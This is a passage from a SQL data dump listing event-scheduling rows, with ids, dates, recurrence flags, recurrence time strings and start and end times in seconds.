L,'','',54000,57600),(177,266357,'2022-03-28','2022-03-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(178,266368,'2022-04-10','2022-04-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(179,266371,'2022-04-08','2022-04-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(180,266372,'2022-04-03','2022-04-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(181,266375,'2022-04-10','2022-04-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(182,266379,'2022-04-10','2022-04-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(184,266396,'2022-04-16','2022-04-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(185,266399,'2022-04-18','2022-04-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(456,268912,'2023-09-09','2023-09-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,61200),(187,266402,'2022-04-25','2022-04-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(188,266405,'2022-04-24','2022-04-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(189,266407,'2022-04-06','2022-04-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(190,266411,'2022-05-04','2022-05-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(191,266414,'2022-06-01','2022-06-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(192,266416,'2022-04-19','2022-04-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',25200,72000),(195,266432,'2022-04-30','2022-04-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(199,266460,'2022-04-30','2022-04-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(201,266462,'2022-03-31','2022-03-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(204,266467,'2022-05-14','2022-05-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,50400),(206,266474,'2022-04-09','2022-04-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(207,266522,'2023-04-30','2023-04-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,43200),(209,266540,'2027-05-09','2027-05-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(210,266543,'2027-04-15','2027-04-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(211,266544,'2027-08-15','2027-08-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(212,266545,'2027-04-11','2027-04-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(215,266568,'2022-05-08','2022-05-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(216,266573,'2022-05-01','2022-05-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(217,266575,'2022-05-22','2022-05-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(218,266576,'2022-06-26','2022-06-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(219,266597,'2022-05-08','2022-05-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(220,266604,'2022-12-18','2022-12-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',42300,46800),(221,266611,'2022-05-17','2022-09-20',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(222,266619,'2022-06-12','2022-10-31',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(223,266625,'2022-05-17','2022-05-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,37800),(224,266626,'2022-09-15','2022-09-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(225,266633,'2022-05-13','2022-05-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(226,266657,'2022-05-17','2022-05-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(227,266676,'2022-05-22','2022-05-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(228,266678,'2022-05-22','2022-05-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(229,266688,'2022-05-11','2023-04-12',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(230,266690,'2022-06-05','2022-06-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(231,266713,'2022-06-12','2022-06-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(232,266715,'2022-06-12','2022-06-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(233,266719,'2022-06-26','2022-06-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(234,266722,'2022-06-10','2022-06-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(235,266725,'2022-06-20','2022-06-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(236,266728,'2022-06-27','2022-06-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(238,266733,'2022-06-10','2022-06-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(239,266735,'2022-06-20','2022-06-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(240,266737,'2022-06-27','2022-06-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(241,266738,'2022-06-26','2022-06-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(242,266739,'2022-06-12','2022-06-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(243,266742,'2022-06-21','2022-06-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(244,266764,'2022-06-19','2022-06-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,37800),(245,266815,'2022-07-03','2022-07-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(246,266813,'2022-07-08','2022-07-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(247,266820,'2022-07-10','2022-07-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(248,266826,'2022-07-10','2022-07-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(249,266827,'2022-01-06','2022-01-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(250,266829,'2022-07-06','2022-07-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(251,266831,'2022-08-03','2022-08-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(252,266832,'2022-09-07','2022-09-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(253,266838,'2022-07-24','2022-07-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(254,266841,'2022-07-09','2022-07-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(255,266844,'2022-07-24','2022-07-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(256,266849,'2022-07-19','2022-07-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(257,266871,'2022-08-21','2022-10-23',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(258,266883,'2022-08-28','2022-08-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(259,266888,'2022-09-10','2022-09-11',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,61200),(261,266983,'2022-08-14','2022-08-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,54000),(262,266988,'2022-08-07','2022-08-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(263,266990,'2022-08-19','2022-08-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(264,266994,'2022-08-16','2022-08-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(265,266996,'2022-08-14','2022-08-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(266,266998,'2022-08-28','2022-08-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(267,267037,'2022-09-25','2022-09-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(268,267041,'2022-09-04','2022-09-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(269,267043,'2022-09-24','2022-09-24',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,39600),(270,267044,'2022-09-11','2022-09-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(271,267092,'2022-09-15','2022-09-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(272,267101,'2022-09-18','2022-09-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(273,267102,'2022-10-02','2022-10-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(274,267103,'2022-10-16','2022-10-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(275,267105,'2022-11-06','2022-11-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(276,267106,'2022-11-20','2022-11-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(277,267108,'2022-12-04','2022-12-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(278,267185,'2022-09-20','2022-09-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(279,267186,'2022-09-23','2022-09-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',64800,68400),(280,267207,'2022-10-15','2022-10-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(281,267211,'2022-09-25','2022-09-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(282,267219,'2022-10-30','2022-10-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(283,267222,'2022-10-08','2022-10-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(284,267230,'2022-10-02','2022-10-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(285,267231,'2022-10-21','2022-10-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(286,267237,'2022-10-09','2022-10-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(287,267252,'2022-10-05','2022-10-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(288,267268,'2022-10-29','2022-10-29',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,39600),(289,267309,'2022-11-19','2022-11-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,39600),(290,267334,'2022-11-06','2022-11-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(291,267338,'2022-11-02','2022-11-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(292,267341,'2022-11-20','2022-11-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(293,267345,'2022-11-27','2022-11-27',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(294,267346,'2022-11-17','2022-11-17',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(295,267408,'2022-11-13','2022-11-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(296,267433,'2023-01-22','2023-04-23',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',42300,46800),(297,267447,'2023-01-28','2023-01-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(298,267449,'2022-12-10','2022-12-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',39600,43200),(299,267511,'2022-12-04','2022-12-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(300,267513,'2022-12-07','2022-12-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(301,267514,'2023-02-09','2023-02-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(302,267515,'2023-01-12','2023-01-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,73800),(303,267539,'2022-12-18','2022-12-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(304,267554,'2022-12-11','2022-12-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(305,267568,'2022-12-18','2022-12-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(306,267570,'2023-01-22','2023-06-25',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(307,267571,'2022-12-29','2022-12-29',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(308,267573,'2023-01-14','2023-01-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(309,267575,'2023-01-14','2023-01-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(310,267576,'2023-01-19','2023-01-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(311,267577,'2023-01-08','2023-01-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(312,267579,'2023-01-01','2023-01-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(313,267609,'2023-01-22','2023-01-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(314,267613,'2023-01-01','2023-01-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(315,267617,'2023-02-21','2023-02-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(316,267619,'2023-02-24','2023-02-24',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-02-24:2023-02-24:06-30-PM:08-30-PM,2023-03-10:2023-03-10:06-30-PM:08-30-PM,2023-03-24:2023-03-24:06-30-PM:08-30-PM,2023-03-31:2023-03-31:06-30-PM:08-30-PM,2023-04-14:2023-04-14:06-30-PM:08-30-PM,2023-04-28:2023-04-28:06-30-PM:08-30-PM','',66600,73800),(317,267620,'2023-01-29','2023-01-29',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,43200),(318,267624,'2023-02-01','2023-02-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(319,267692,'2023-01-26','2023-01-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,54000),(320,267693,'2023-01-26','2023-01-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,54000),(321,267694,'2023-02-05','2023-02-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(322,267695,'2023-02-05','2023-02-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(323,267697,'2023-02-08','2023-02-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(324,267698,'2023-02-18','2023-02-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(325,267699,'2023-02-18','2023-02-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(326,267700,'2023-02-21','2023-02-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(327,267701,'2023-02-23','2023-02-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,54000),(328,267730,'2023-02-12','2023-02-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(329,267733,'2023-02-16','2023-02-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(330,267807,'2023-02-11','2023-02-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(331,267809,'2023-02-05','2023-02-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(332,267812,'2023-02-19','2023-02-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(333,267813,'2023-02-12','2023-02-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(334,267872,'2023-02-26','2023-02-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(335,267895,'2022-03-19','2022-11-19',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,45000),(336,267918,'2023-02-15','2023-02-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',63000,66600),(337,267919,'2023-03-23','2023-03-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,54000),(338,268025,'2023-03-05','2023-03-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(479,269121,'2023-10-14','2023-10-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',48600,52200),(340,268029,'2023-03-08','2023-03-08',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(341,268031,'2023-03-09','2023-03-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(342,268038,'2023-02-25','2023-02-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(343,268039,'2023-02-25','2023-02-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(344,268150,'2023-03-26','2023-03-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(345,268157,'2023-04-20','2023-04-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(346,268158,'2023-04-20','2023-04-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(347,268159,'2023-03-16','2023-03-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(348,268161,'2023-03-12','2023-03-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(349,268171,'2023-04-11','2023-04-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',50400,54000),(350,268177,'2023-04-02','2023-04-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(351,268178,'2023-03-19','2023-03-19',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(352,268179,'2023-04-12','2023-04-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(353,268181,'2023-04-23','2023-04-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(354,268193,'2023-04-13','2023-04-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(355,268195,'2023-04-02','2023-04-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(480,269123,'2023-10-14','2023-10-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',48600,52200),(357,268208,'2023-04-22','2023-04-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,46800),(358,268210,'2023-04-16','2023-04-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(359,268212,'2023-04-16','2023-04-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(360,268213,'2023-04-05','2023-04-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(361,268215,'2023-05-03','2023-05-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(362,268216,'2023-06-07','2023-06-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(363,267696,'2021-04-22','2021-04-22',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(364,268243,'2023-04-03','2023-04-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(365,268244,'2023-04-01','2023-04-01',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(366,268246,'2023-04-18','2023-04-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',54000,57600),(367,268248,'2023-04-15','2023-04-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(381,268411,'2023-08-13','2023-08-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(369,268251,'2022-01-06','2022-01-06',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',28800,64800),(370,268252,'2023-04-02','2023-04-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(371,268255,'2023-04-16','2023-04-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,50400),(372,268258,'2023-04-21','2023-04-21',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-04-22:2023-04-22:10-00-AM:07-00-PM,2023-04-23:2023-04-23:10-00-AM:06-00-PM','',46800,75600),(373,268262,'2023-04-09','2023-04-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(374,268264,'2023-04-23','2023-04-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(375,268265,'2023-04-14','0000-00-00',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(376,268279,'2023-04-23','2023-04-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(377,268282,'2023-05-13','2023-05-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,50400),(378,268406,'2023-05-07','2023-05-07',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM','',37800,41400),(380,268410,'2023-05-14','2023-05-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(403,268530,'2023-06-17','2023-06-17',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM','',48600,52200),(498,269323,'2023-11-26','2023-11-26',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(384,268419,'2023-05-10','2023-05-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(385,268420,'2023-05-14','2023-05-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(386,268422,'2023-05-07','2023-05-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(387,268423,'2023-05-28','2023-05-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(388,268425,'2023-04-30','2023-04-30',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,43200),(389,268426,'2023-05-21','2023-05-21',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(390,268427,'2023-05-28','2023-05-28',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(391,268430,'2023-05-07','2023-05-07',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(392,268440,'2023-05-28','2024-04-28',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',43200,48000),(393,268447,'2023-05-13','2023-05-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(394,268450,'2023-05-18','2023-05-18',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(395,268452,'2023-05-11','2023-05-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(396,268461,'2023-05-20','0000-00-00',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-06-04:2023-06-04:10-30-AM:11-30-AM,2023-07-02:2023-07-02:10-30-AM:11-30-AM','',48600,52200),(397,268477,'2023-06-11','2023-06-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(398,268478,'2023-06-11','2023-06-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(399,268479,'2023-06-25','2023-06-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(400,268481,'2023-06-04','2023-06-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',57600,63000),(401,268482,'2023-06-11','2023-06-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(402,268484,'2023-06-04','2023-06-04',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(404,268531,'2023-06-03','2023-06-03',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(405,268565,'2023-06-11','2023-06-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(482,269140,'2023-10-06','2023-10-06',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-10-07:2023-10-07:10-00-AM:05-00-PM,2023-10-08:2023-10-08:10-00-AM:05-00-PM','',36000,61200),(407,268568,'2023-06-25','2023-06-25',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(408,268593,'2023-06-15','2023-06-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(409,268596,'2023-06-14','2023-06-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',70200,73800),(410,268595,'2023-06-14','2023-06-14',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(484,269144,'2023-10-15','2023-10-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(412,268633,'2023-06-25','2024-05-26',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',43200,48000),(413,268639,'2023-06-24','2023-06-24',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',36000,68400),(414,268661,'2023-07-09','2023-07-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(415,268678,'2023-07-02','2023-07-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(417,268681,'2023-07-02','2023-07-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(418,268682,'2023-07-09','2023-07-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(419,268685,'2023-07-02','2023-07-02',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(420,268726,'2027-08-15','2027-08-15',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,84600),(421,268730,'2023-09-10','2023-09-10',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(422,268736,'2023-08-05','2023-08-05',1,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2023-08-06:2023-08-06:09-00-AM:12-00-PM','',31500,79200),(423,268743,'2023-07-23','2023-07-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(424,268745,'2023-07-31','2023-07-31',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(425,268747,'2023-07-09','2023-07-09',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(426,268751,'2023-07-12','2023-07-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(427,268752,'2023-07-23','2023-07-23',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',37800,41400),(428,268753,'2023-07-05','2023-07-05',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(429,268759,'2023-07-12','2023-07-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(430,268761,'2023-07-12','2023-07-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(431,268762,'2023-07-20','2023-07-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(432,268763,'2023-07-12','2023-07-12',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',66600,70200),(433,268764,'2023-07-20','2023-07-20',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(434,268765,'2023-07-11','2023-07-11',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',68400,72000),(435,268794,'2023-09-16','2023-09-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,50400),(436,268797,'2023-08-13','2023-08-13',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200),(438,268837,'2023-08-16','2023-08-16',0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'','',46800,52200)